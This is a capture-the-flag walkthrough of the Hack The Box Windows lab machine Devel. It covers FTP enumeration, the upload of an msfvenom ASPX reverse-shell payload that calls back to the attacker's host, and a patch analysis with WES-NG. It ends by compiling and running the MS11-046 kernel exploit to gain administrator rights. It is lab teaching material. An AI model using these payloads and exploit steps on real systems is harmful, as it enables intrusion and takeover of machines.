Today we are going to solve another boot-to-root Windows machine, Devel, created by ch4p. It is a retired lab, available in the Hack The Box retired section. Let's jump into it.
Level : Easy
- Network Scanning
- FTP Enumeration
- ASPX reverse shell
- Privilege Escalation
- MS11-046 Exploit
IP address : 10.129.68.202
We start by firing Nmap with an aggressive scan (-A), which combines OS detection, the default script scan, traceroute and version detection.
nmap -A 10.129.68.202
The Nmap output shows port 21 (FTP) with anonymous login allowed, which gives us a window for an initial foothold. It also shows that the machine is Windows based and that an IIS 7.5 server is hosted on port 80.
Nmap scan report for 10.129.68.202
Host is up (0.16s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Now we start enumerating port 21, the FTP service. One thing catches the eye here: the files listed by ftp-anon (aspnet_client, iisstart.htm, welcome.png) are the default contents of an IIS webroot, so the anonymous FTP share appears to be the IIS root directory itself.
echo "10.129.68.202 devel.htb" | sudo tee -a /etc/hosts
ftp devel.htb
Username : Anonymous
Password : Anonymous
We can confirm this by uploading a small test file over FTP and then checking whether it is reachable over HTTP. So we upload a small HTML file with some text (pick a file name that does not already exist, so nothing on the server is overwritten) and then request it by its path in the browser.
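The same check as a script, added here as an example (it is not part of the original write-up): it uploads a file with a random name and random contents over anonymous FTP, fetches the same path over HTTP and compares the two bodies. The upload, fetch and cleanup steps are passed in as callables so the comparison logic can be exercised without a target; the ftplib/urllib helpers assume the lab host 10.129.68.202 with anonymous login, as in the nmap output above.

```python
"""Confirm that the anonymous FTP root is the IIS webroot.

Added example, not code from the write-up. The upload/fetch/cleanup steps
are passed in as callables so the comparison logic can be run without a
target; the ftplib/urllib helpers below assume the lab host 10.129.68.202
with anonymous FTP, as in the nmap output.
"""
import io
import secrets
from ftplib import FTP
from urllib.error import HTTPError
from urllib.request import urlopen


def verify_shared_root(ftp_put, http_get, cleanup=None):
    """Upload a probe file and fetch the same path over HTTP.

    ftp_put(name, data) stores the file; http_get(name) returns the body
    bytes or None on 404; cleanup(name), if given, removes the probe again.
    A random name avoids clobbering an existing file, and a random body
    means a cached page or a default document cannot produce a false match.
    Returns (shared, probe_name).
    """
    name = f"probe-{secrets.token_hex(4)}.txt"
    body = secrets.token_hex(16).encode()
    ftp_put(name, body)
    try:
        fetched = http_get(name)
    finally:
        if cleanup is not None:
            cleanup(name)
    return fetched == body, name


def make_ftp_put(host, user="anonymous", password="anonymous"):
    def ftp_put(name, data):
        with FTP(host, timeout=10) as ftp:
            ftp.login(user, password)
            ftp.storbinary(f"STOR {name}", io.BytesIO(data))
    return ftp_put


def make_ftp_delete(host, user="anonymous", password="anonymous"):
    def ftp_delete(name):
        with FTP(host, timeout=10) as ftp:
            ftp.login(user, password)
            ftp.delete(name)
    return ftp_delete


def make_http_get(host):
    def http_get(name):
        try:
            with urlopen(f"http://{host}/{name}", timeout=10) as resp:
                return resp.read()
        except HTTPError as err:
            if err.code == 404:
                return None
            raise
    return http_get


if __name__ == "__main__":
    target = "10.129.68.202"  # lab IP from the scan above (assumed reachable)
    shared, probe = verify_shared_root(
        make_ftp_put(target), make_http_get(target), make_ftp_delete(target))
    print(f"{probe}: {'FTP root is the webroot' if shared else 'not served over HTTP'}")
```

The probe is deleted afterwards so the webroot is left as we found it; if the delete fails the exception surfaces and the file name is printed, so it can be removed by hand.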
Once our test page is served over HTTP, we can move on to exploitation. Here we create the payload in ASPX format, because IIS executes .aspx pages server-side (the aspnet_client directory in the listing suggests ASP.NET is enabled), so an uploaded .aspx file runs instead of being served as a static file. For more on why we use an ASPX payload you can check out here.
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=4445 -f aspx > shell.aspx
Once the payload is ready, we upload it through the FTP service, start a listener on port 4445 (the LPORT we chose), and then request the file with curl or the browser; IIS executes it and we get our initial foothold on the lab.
If everything is done correctly we get our shell.
Now it's time to get higher privileges: we need administrator rights. For that we have to enumerate the machine further, starting with the OS version, installed patches and anything else we can use later. Windows has the systeminfo command for this; we redirect its output to a file because we will feed it to a tool in the next step.
systeminfo.exe > systeminfo.txt
Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:
Product ID:                55041-051-0948536-86302
Original Install Date:     17/3/2017, 4:17:31
System Boot Time:          21/4/2021, 4:49:31
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     3.071 MB
Available Physical Memory: 2.470 MB
Virtual Memory: Max Size:  6.141 MB
Virtual Memory: Available: 5.551 MB
Virtual Memory: In Use:    590 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Local Area Connection 4
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.129.0.1
                                 IP address(es)
                                 [01]: 10.129.68.202
                                 [02]: fe80::4a6:d5ca:df49:2a13
                                 [03]: dead:beef::f442:8dbc:7624:dbab
As we can see, no hotfixes are installed on this machine (Hotfix(s): N/A), so a kernel exploit is a good candidate. Two details are worth noting for later: the OS is Windows 7 build 7600 without a service pack, and System Type says X86-based PC even though the processor line says x64, so this is a 32-bit OS on a 64-bit CPU, which decides how we compile the exploit. There are several ways to proceed: we could use the Metasploit local exploit suggester module and then one of the exploits it lists, or do it manually. For this article we do it manually, because we want to learn more.
For that we use a tool called WES-NG (wesng), which you can get from GitHub. All we need to do is pass it the systeminfo output and it lists the missing patches and the known exploits for them.
WES-NG is a tool based on the output of Windows' systeminfo utility which provides the list of vulnerabilities the OS is vulnerable to, including any exploits for these vulnerabilities. Every Windows OS between Windows XP and Windows 10, including their Windows Server counterparts, is supported.
python wes.py systeminfo.txt --exploits-only -i "Elevation of Privilege"
Windows Exploit Suggester 0.98 ( https://github.com/bitsadmin/wesng/ )
[+] Parsing systeminfo output
[+] Operating System
    - Name: Windows 7 for 32-bit Systems
    - Generation: 7
    - Build: 7600
    - Version: None
    - Architecture: 32-bit
    - Installed hotfixes: None
[+] Loading definitions
    - Creation date of definitions: 20210416
[+] Determining missing patches
[+] Applying display filters
[+] Found vulnerabilities

Date: 20130108
CVE: CVE-2013-0008
KB: KB2778930
Title: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege
Affected product: Windows 7 for 32-bit Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: http://www.exploit-db.com/exploits/24485

Date: 20110614
CVE: CVE-2011-1249
KB: KB2503665
Title: Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege
Affected product: Windows 7 for 32-bit Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/40564/

Date: 20110208
CVE: CVE-2010-4398
KB: KB2393802
Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
Affected product: Windows 7 for 32-bit Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploits: http://www.exploit-db.com/bypassing-uac-with-user-privilege-under-windows-vista7-mirror/, http://www.exploit-db.com/exploits/15609/

Date: 20100209
CVE: CVE-2010-0232
KB: KB977165
Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
Affected product: Windows 7 for 32-bit Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploits: http://lock.cmpxchg8b.com/c0af0967d904cef2ad4db766a00bc6af/KiTrap0D.zip, http://www.securityfocus.com/bid/37864

[+] Missing patches: 4
    - KB977165: patches 1 vulnerability
    - KB2778930: patches 1 vulnerability
    - KB2393802: patches 1 vulnerability
    - KB2503665: patches 1 vulnerability
[+] KB with the most recent release date
    - ID: KB2778930
    - Release date: 20130108
[+] Done. Displaying 4 of the 236 vulnerabilities found.
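To see what WES-NG actually extracts from systeminfo before matching it against its definitions, here is an added example (my own code, not the write-up's and not WES-NG's): it parses the fields that matter (OS name, build, service pack, bitness, hotfix list), checks them against the four KBs WES-NG reported for this build, and picks the mingw-w64 driver that matches the OS bitness. Both SAMPLE blocks are constructed: the first reproduces the Devel fields shown above, the second is an invented, partly patched x64 host that shows the multi-line hotfix format.

```python
"""Extract what WES-NG needs from systeminfo output and check a patch list.

Added example, not code from the write-up or from WES-NG. Both SAMPLE
blocks are constructed: SAMPLE_DEVEL reproduces the fields shown above,
SAMPLE_PATCHED is an invented x64 host with three hotfixes installed.
"""
import re

SAMPLE_DEVEL = """\
Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
"""

SAMPLE_PATCHED = """\
Host Name:                 WS01
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2503665
                           [02]: KB2778930
                           [03]: KB977165
Network Card(s):           1 NIC(s) Installed.
"""

# The four KBs WES-NG listed as missing for build 7600 (taken from its output above).
EOP_PATCHES = {
    "KB977165": "CVE-2010-0232 (KiTrap0D)",
    "KB2393802": "CVE-2010-4398",
    "KB2503665": "CVE-2011-1249 (MS11-046, afd.sys)",
    "KB2778930": "CVE-2013-0008",
}

FIELD = re.compile(r"^([^:]+?):\s*(.*)$")            # "Key:      value"
HOTFIX_LINE = re.compile(r"^\s+\[\d+\]:\s*(KB\d+)")  # "   [01]: KB977165"


def parse_systeminfo(text):
    """Return os_name, build, service_pack, arch ('x86'/'x64') and hotfixes.

    Hotfix(s) is either "N/A" or "<n> Hotfix(s) Installed." followed by one
    indented "[nn]: KBxxxxxx" line per patch, so those lines are consumed
    here instead of being treated as fields of their own.
    """
    info = {"os_name": None, "build": None, "service_pack": 0,
            "arch": None, "hotfixes": []}
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        m = FIELD.match(lines[i])
        key, value = (m.group(1).strip(), m.group(2).strip()) if m else ("", "")
        if key == "OS Name":
            info["os_name"] = value
        elif key == "OS Version":
            build = re.search(r"Build (\d+)", value)
            info["build"] = int(build.group(1)) if build else None
            sp = re.search(r"Service Pack (\d+)", value)
            info["service_pack"] = int(sp.group(1)) if sp else 0
        elif key == "System Type":
            # "X86-based PC" means a 32-bit OS even when the CPU line says x64.
            info["arch"] = "x64" if value.lower().startswith("x64") else "x86"
        elif key == "Hotfix(s)":
            i += 1
            while i < len(lines) and HOTFIX_LINE.match(lines[i]):
                info["hotfixes"].append(HOTFIX_LINE.match(lines[i]).group(1))
                i += 1
            continue
        i += 1
    return info


def missing_patches(info, catalogue=EOP_PATCHES):
    """KBs from the catalogue that are absent from the host's hotfix list."""
    installed = set(info["hotfixes"])
    return sorted(kb for kb in catalogue if kb not in installed)


def cross_compiler(info):
    """mingw-w64 driver matching OS bitness; a 64-bit .exe will not start on a 32-bit OS."""
    return "x86_64-w64-mingw32-gcc" if info["arch"] == "x64" else "i686-w64-mingw32-gcc"


if __name__ == "__main__":
    for sample in (SAMPLE_DEVEL, SAMPLE_PATCHED):
        host = parse_systeminfo(sample)
        print(host["os_name"], "build", host["build"], host["arch"])
        for kb in missing_patches(host):
            print("  missing", kb, "->", EOP_PATCHES[kb])
        print("  compile with", cross_compiler(host))
```

The bitness check is the practical part: WES-NG reported "Windows 7 for 32-bit Systems" for Devel, and the compile step later uses the i686 driver for exactly that reason.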
The result shows four possible exploits. In my case https://www.exploit-db.com/exploits/40564/ (MS11-046, the Ancillary Function Driver vulnerability CVE-2011-1249, patched by KB2503665) worked fine; all we have to do is compile it. We can download the exploit from Exploit-DB, or searchsploit can play that role.
searchsploit -m 40564
Now it's time to compile the exploit. It is C code for Windows, so on Kali we need the mingw-w64 cross compiler, which is available in the Kali repository. Because the target OS is 32-bit (System Type: X86-based PC in systeminfo, and WES-NG reported "Windows 7 for 32-bit Systems"), we use the i686 driver; a 64-bit build would not run there. Once the exploit is built, we transfer it to the machine (for example by uploading it over the same anonymous FTP share we used for the shell) and run it from our reverse shell.
sudo apt-get update && sudo apt-get install mingw-w64
i686-w64-mingw32-gcc 40564.c -o exploit.exe -lws2_32
Here we get administrator privileges (we can confirm the new context with whoami), and now we can read the flags and submit them to the portal.
type "C:\Users\Administrator\Desktop\root.txt"
type "C:\Users\babis\Desktop\user.txt.txt"